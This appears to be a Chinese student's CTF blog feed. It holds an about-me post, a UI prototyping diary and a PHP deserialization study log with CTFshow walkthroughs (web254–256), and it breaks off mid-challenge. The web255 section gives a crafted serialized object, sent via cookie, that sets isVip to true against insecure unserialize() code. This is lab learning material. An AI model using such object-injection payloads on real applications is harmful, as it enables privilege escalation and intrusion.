<content type="html"><![CDATA[<h1 id="关于本博客"><a href="#关于本博客" class="headerlink" title="关于本博客"></a>关于本博客</h1><h2 id="本博客建立的目的"><a href="#本博客建立的目的" class="headerlink" title="本博客建立的目的"></a>本博客建立的目的</h2><p> 本博客建立是为了记录我本人,也就是Fisssssh,在CTF,文学,哲学以及其他方面的学习与交流过程,并将其更新在本博客上,与全国各地的师傅互相学习。因此,关于博客中出现的非专业用语或表示请多多包涵。另外,本人并非现在才开始学习此类东西,碍于博客建立的日期,后期会酌情补充相关内容,请敬请期待吧(笑)<br><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/20251123231454.jpg"></p><h2 id="关于Fisssssh"><a href="#关于Fisssssh" class="headerlink" title="关于Fisssssh"></a>关于Fisssssh</h2><p> 本人的ID为Fisssssh(五个s),是来自太原理工大学25级的一名新晋CTFer,目前正在UKFC的子队UKY中进行学习(期望未来可以进入主队),目前主攻web方向,希望能和本战队的队友以及素未谋面的师傅们一起学习进步。</p><p> 我在2025年9月4日来到太原理工大学,面对新的大学生活,希望我可以用最积极的心态面对未来的挑战,同时我也对新的机遇充满期待,今后的有关见闻,我都会第一时间发布到我的博客上面,希望大家可以互相帮助与学习<br><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/20251123231629.jpg"></p><h2 id="关于我的ID"><a href="#关于我的ID" class="headerlink" title="关于我的ID"></a>关于我的ID</h2><p> 本人原ID为咸鱼体验(不知道有没有人之前见过我),取咸鱼的英文fish更改而成,寓意自然就是“咸鱼翻身”吧(笑)<br><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/20251123231523.jpg"></p><h2 id="关于本人的爱好"><a href="#关于本人的爱好" class="headerlink" title="关于本人的爱好"></a>关于本人的爱好</h2><p> 本人实际上是一名车万,但不是游戏向,仅仅是喜欢这个IP,因此很乐意可以认识到更多的车车人~</p><p> 游戏方面喜欢玩MC,洲和瓦可以打但是仅限于能打的地步(其实是我玩不来FPS游戏),喜欢独立游戏,有什么好玩的独立游戏请不要吝啬推给我吧(笑)<br><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/20251123231524.jpg"><br>baka镇楼</p>]]></content>
</entry>
<entry>
<title>前端开发日记</title>
<link href="/2025/01/29/%E5%89%8D%E7%AB%AF%E5%BC%80%E5%8F%91%E6%97%A5%E8%AE%B0/"/>
<url>/2025/01/29/%E5%89%8D%E7%AB%AF%E5%BC%80%E5%8F%91%E6%97%A5%E8%AE%B0/</url>
<content type="html"><![CDATA[<h1 id="AI-前端学习笔记"><a href="#AI-前端学习笔记" class="headerlink" title="AI+前端学习笔记"></a>AI+前端学习笔记</h1><h1 id="1-28"><a href="#1-28" class="headerlink" title="1.28"></a>1.28</h1><p>项目链接<a href="https://modao.cc/proto/E4SLDLz6t9kg9lALFTnBc0/sharing?view_mode=read_only">https://modao.cc/proto/E4SLDLz6t9kg9lALFTnBc0/sharing?view_mode=read_only</a> #未命名原型 3-分享</p><p>主要学习了墨刀的基本使用方法并基于墨刀搭建了一个视频播放网站界面</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192128534.png" alt="image-20260128192128534"></p><p>划分为“首页”“关注”“会员购”“我的”四个板块</p><h3 id="1-首页"><a href="#1-首页" class="headerlink" title="1.首页"></a>1.首页</h3><p>头部设有头像,搜索框,设置图标</p><p>然后就是轮播图,视频可以自由上下翻页</p><p>页面底部增添了导航页,可以导航至其他页面</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192548649.png" alt="image-20260128192548649"></p><h3 id="2-关注"><a href="#2-关注" class="headerlink" title="2.关注"></a>2.关注</h3><p>关注页面可以滑动,动态页面可以滑动</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192534994.png" alt="image-20260128192534994"></p><h3 id="3-会员购"><a href="#3-会员购" class="headerlink" title="3.会员购"></a>3.会员购</h3><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192619323.png" alt="image-20260128192619323"></p><h3 id="3-我的页面"><a href="#3-我的页面" class="headerlink" title="3.我的页面"></a>3.我的页面</h3><p>支持修改个人信息,头像文件上传,</p><h3 id=""><a href="#" class="headerlink" title=""></a><img src="C:\Users\18636\AppData\Roaming\Typora\typora-user-images\image-20260128192558802.png" alt="image-20260128192558802"></h3><p>单击“保存”后显示“已更新”的toast效果并返回页面</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192737321.png" alt="image-20260128192737321"></p>]]></content>
</entry>
<entry>
<title>UKFC日志(持续更新)</title>
<link href="/2025/01/29/UKFC%E6%97%A5%E5%BF%97/"/>
<url>/2025/01/29/UKFC%E6%97%A5%E5%BF%97/</url>
<content type="html"><![CDATA[<h1 id="第12-29–1-4周"><a href="#第12-29–1-4周" class="headerlink" title="第12.29–1.4周"></a>第12.29–1.4周</h1><p>本周深入练习了一下反序列化,学会了很多绕过的方法的技巧,同时还对php的几乎每一种魔术方法进行了深入了解,补全了之前很多欠缺的知识,靶场同样还是用的CTFshow</p><p>先粘一下从大佬博客那里偷过来的魔术方法总结()</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">__construct()</span><br><span class="line">类的构造函数</span><br><span class="line">__destruct()</span><br><span class="line">类的析构函数</span><br><span class="line">__call()</span><br><span class="line">在对象中调⽤⼀个不可访问⽅法时调⽤</span><br><span class="line">__callStatic()</span><br><span class="line">⽤静态⽅式中调⽤⼀个不可访问⽅法时调⽤</span><br><span class="line">__get()</span><br><span class="line">获得⼀个类的成员变量时调⽤</span><br><span class="line">__set()</span><br><span class="line">设置⼀个类的成员变量时调⽤</span><br><span class="line">__isset()</span><br><span class="line">当对不可访问属性调⽤isset()或empty()时调⽤</span><br><span class="line">__unset()</span><br><span class="line">当对不可访问属性调⽤</span><br><span class="line">unset()</span><br><span class="line">时被调⽤。</span><br><span class="line">__sleep()</span><br><span class="line">,执⾏serialize()时,先会调⽤这个函数</span><br><span class="line">__wakeup()</span><br><span class="line">执⾏unserialize()时,先会调⽤这个函数</span><br><span class="line">__toString()</span><br><span class="line">类被当成字符串时的回应⽅法</span><br><span class="line">__invoke()</span><br><span class="line">调⽤函数的⽅式调⽤⼀个对象时的回应⽅法</span><br><span class="line">__set_state()</span><br><span class="line">调⽤</span><br><span class="line">var_export()</span><br><span class="line">导出类时,此静态⽅法会被调⽤。</span><br><span class="line">__clone()</span><br><span class="line">当对象复制完成时调⽤</span><br><span class="line">__autoload()</span><br><span class="line">尝试加载未定义的类</span><br><span class="line">__debugInfo()</span><br><span class="line">打印所需调试信息</span><br></pre></td></tr></table></figure><p>访问控制修饰符(public、protected、private)不同时,序列化后的结果也不同</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">public 被序列化的时候属性名不会更改 </span><br><span class="line">protected 被序列化的时候属性名会变成 %00*%00属性名</span><br><span class="line">private 被序列化的时候属性名会变成 %00类名%00属性名</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">1、__get、__set</span><br><span class="line">这两个⽅法是为在类和他们的⽗类中没有声明的属性⽽设计的</span><br><span class="line">__get( $property ) 当调⽤⼀个未定义的属性时访问此⽅法</span><br><span class="line">__set( $property, $value ) 给⼀个未定义的属性赋值时调⽤</span><br><span class="line">这⾥的没有声明包括访问控制为proteced,private的属性(即没有权限访问的属性)</span><br><span class="line">2、__isset、__unset</span><br><span class="line">__isset( $property ) 当在⼀个未定义的属性上调⽤isset()函数时调⽤此⽅法</span><br><span class="line">__unset( $property ) 当在⼀个未定义的属性上调⽤unset()函数时调⽤此⽅法</span><br><span class="line">与__get⽅法和__set⽅法相同,这⾥的没有声明包括访问控制为proteced,private的属性(即没有权限访问的属性)</span><br><span class="line">3、__call</span><br><span class="line">__call( $method, $arg_array ) </span><br><span class="line">当调⽤⼀个未定义(包括没有权限访问)的⽅法是调⽤此⽅法</span><br><span class="line">4、__autoload</span><br><span class="line">__autoload 函数,使⽤尚未被定义的类时⾃动调⽤。通过此函数,脚本引擎在 PHP 出错失败前有了最后⼀个机会加载所需的类。</span><br><span class="line"></span><br><span class="line">注意: 在 __autoload 函数中抛出的异常不能被 catch 语句块捕获并导致致命错误。</span><br><span class="line">5、__construct、__destruct</span><br><span class="line">__construct 构造⽅法,当⼀个对象被创建时调⽤此⽅法,好处是可以使构造⽅法有⼀个独⼀⽆⼆的名称,⽆论它所在的类的名称是什么,这样你在改变类的名称时,就不需要改变构造⽅法的名称__destruct 析构⽅法,PHP将在对象被销毁前(即从内存中清除前)调⽤这个⽅法默认情况下,PHP仅仅释放对象属性所占⽤的内存并销毁对象相关的资源,析构函数允许你在使⽤⼀个对象之后执⾏任意代码来清除内存,当PHP决定你的脚本不再与对象相关时,析构函数将被调⽤,在⼀个函数的命名空间内,这会发⽣在函数return的时候,对于全局变量,这发⽣于脚本结束的时候,如果你想明确地销毁⼀个象,你可以给指向该对象的变量分配任何其它值,通常将变量赋值勤为NULL或者调⽤unset。</span><br><span class="line">6、__clone</span><br><span class="line">PHP5中的对象赋值是使⽤的引⽤赋值,使⽤clone⽅法复制⼀个对象时,对象会⾃动调⽤__clone魔术⽅法,如果在对象复制需要执⾏某些初始化操作,可以在__clone⽅法实现。</span><br><span class="line">7、__toString </span><br><span class="line">__toString</span><br><span class="line">⽅法在将⼀个对象转化成字符串时⾃动调⽤,⽐如使⽤echo打印对象时,如果类没有实现此⽅法,则⽆法通过echo打印对象,否则会显示:Catchable fatal error: Object of class test could not be converted to string in,此⽅法必须返回⼀个字符串。在</span><br><span class="line">PHP 5.2.0之前,__toString⽅法只有结合使⽤echo() 或print()时 才能⽣效。PHP 5.2.0之后,则可以在任何字符串环境⽣效(例如通过printf(),使⽤%s修饰符),但 不能⽤于⾮字符串环境(如使⽤%d修饰符)。从PHP 5.2.0,如果将⼀个未定义__toString</span><br><span class="line">⽅法的对象 转换为字符串,会报出⼀个E_RECOVERABLE_ERROR</span><br><span class="line">错误。</span><br><span class="line">8、__sleep、__wakeup</span><br><span class="line">__sleep 串⾏化的时候⽤</span><br><span class="line">__wakeup 反串⾏化的时候调⽤</span><br><span class="line">serialize() 检查类中是否有魔术名称 __sleep 的函数。如果这样,该函数将在任何序列化之前运⾏。它可以清除对象并应该返回⼀个包含有该对象中应被序列化的所有变量名的数组。</span><br><span class="line">使⽤ __sleep 的⽬的是关闭对象可能具有的任何数据库连接,提交等待中的数据或进⾏类似的清除任务。此外,如果有⾮常⼤的对象⽽并不需要完全储存下来时此函数也很有⽤。</span><br><span class="line">相反地,unserialize() 检查具有魔术名称__wakeup 的函数的存在。如果存在,此函数可以重建对象可能具有的任何资源。使⽤ __wakeup 的⽬的是重建在序列化中可能丢失的任何数据库连接以及处理其它重新初始化的任务。</span><br><span class="line">9、__set_state</span><br><span class="line">当调⽤var_export()时,这个静态 ⽅法会被调⽤(⾃PHP 5.1.0起有效)。本⽅法的唯⼀参数是⼀个数组,其中包含array(’property’ => value, …)格式排列的类属性。</span><br><span class="line">10、__invoke</span><br><span class="line">当尝试以调⽤函数的⽅式调⽤⼀个对象时,__invoke⽅法会被⾃动调⽤。PHP5.3.0以上版本有效</span><br><span class="line">11、__callStatic它的⼯作⽅式类似于__call() </span><br><span class="line">魔术⽅法,__callStatic() 是为了处理静态⽅法调⽤,PHP5.3.0以上版本有效,PHP 确实加强了对 __callStatic() ⽅法的定义;它必须是公共的,并且必须被声明为静态的。同样,__call() </span><br><span class="line">魔术⽅法必须被定义为公共的,所有其他魔术⽅法都必须如此。</span><br></pre></td></tr></table></figure><h1 id="web254"><a href="#web254" class="headerlink" title="web254"></a>web254</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 19:29:02</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkVip</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->isVip;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"><span class="variable">$u</span>,<span class="variable">$p</span></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>){</span><br><span class="line"><span class="variable language_">$this</span>->isVip=<span class="literal">true</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->isVip;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">vipOneKeyGetFlag</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->isVip){</span><br><span class="line"><span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"your flag is "</span>.<span class="variable">$flag</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip, no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="variable">$user</span> = <span class="keyword">new</span> <span class="title function_ invoke__">ctfShowUser</span>();</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>)){</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">checkVip</span>()){</span><br><span class="line"><span class="variable">$user</span>-><span class="title function_ invoke__">vipOneKeyGetFlag</span>();</span><br><span class="line">}</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip,no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>和反序列化没有什么关系,直接传username=xxxxxx&password=xxxxxx即可 如果要分析,这⾥就是先new实例化ctfShowUser这个类,如何把username和password参传⼊调 ⽤类中的login⽅法。如果username和password和类中的相等,类中的isVip就为True,为True进 ⼊check就为True,于是拿到flag。</p><h1 id="web255"><a href="#web255" class="headerlink" title="web255"></a>web255</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 19:29:02</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkVip</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->isVip;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"><span class="variable">$u</span>,<span class="variable">$p</span></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">vipOneKeyGetFlag</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->isVip){</span><br><span class="line"><span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"your flag is "</span>.<span class="variable">$flag</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip, no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">'user'</span>]); </span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>)){</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">checkVip</span>()){</span><br><span class="line"> <span class="variable">$user</span>-><span class="title function_ invoke__">vipOneKeyGetFlag</span>();</span><br><span class="line">}</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip,no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>,这⾥在之前的基础上多了个反序列化,是$user = unserialize($_COOKIE[‘user’]); </p><p>⽽且login中少了$this->isVip=true;因此要想办法把isVip给弄成true就是咱的⽬的 </p><p>然后可以发现$user是我们⾃⼰通过COOKIE[‘user’]来传,意思是会对这个user进⾏反序列化。这 是⼀个漏洞点,即通过这个传⼀个序列化后的字符串,通过反序列化来达到isVip=True </p><p>这⾥新建⼀个php⽂件,来进⾏序列化</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span> = <span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span> = <span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span> = <span class="literal">true</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">ctfShowUser</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">O:11:"ctfShowUser":3:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxx</span><br><span class="line">x";s:5:"isVip";b:1;}</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260104223844832.png" alt="image-20260104223844832"></p><h1 id="web256"><a href="#web256" class="headerlink" title="web256"></a>web256</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 19:29:02</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkVip</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->isVip;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"><span class="variable">$u</span>,<span class="variable">$p</span></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">vipOneKeyGetFlag</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->isVip){</span><br><span class="line"><span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->username!==<span class="variable language_">$this</span>->password){</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"your flag is "</span>.<span class="variable">$flag</span>;</span><br><span class="line">}</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip, no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">'password'</span>];</span><br><span class="line"><span 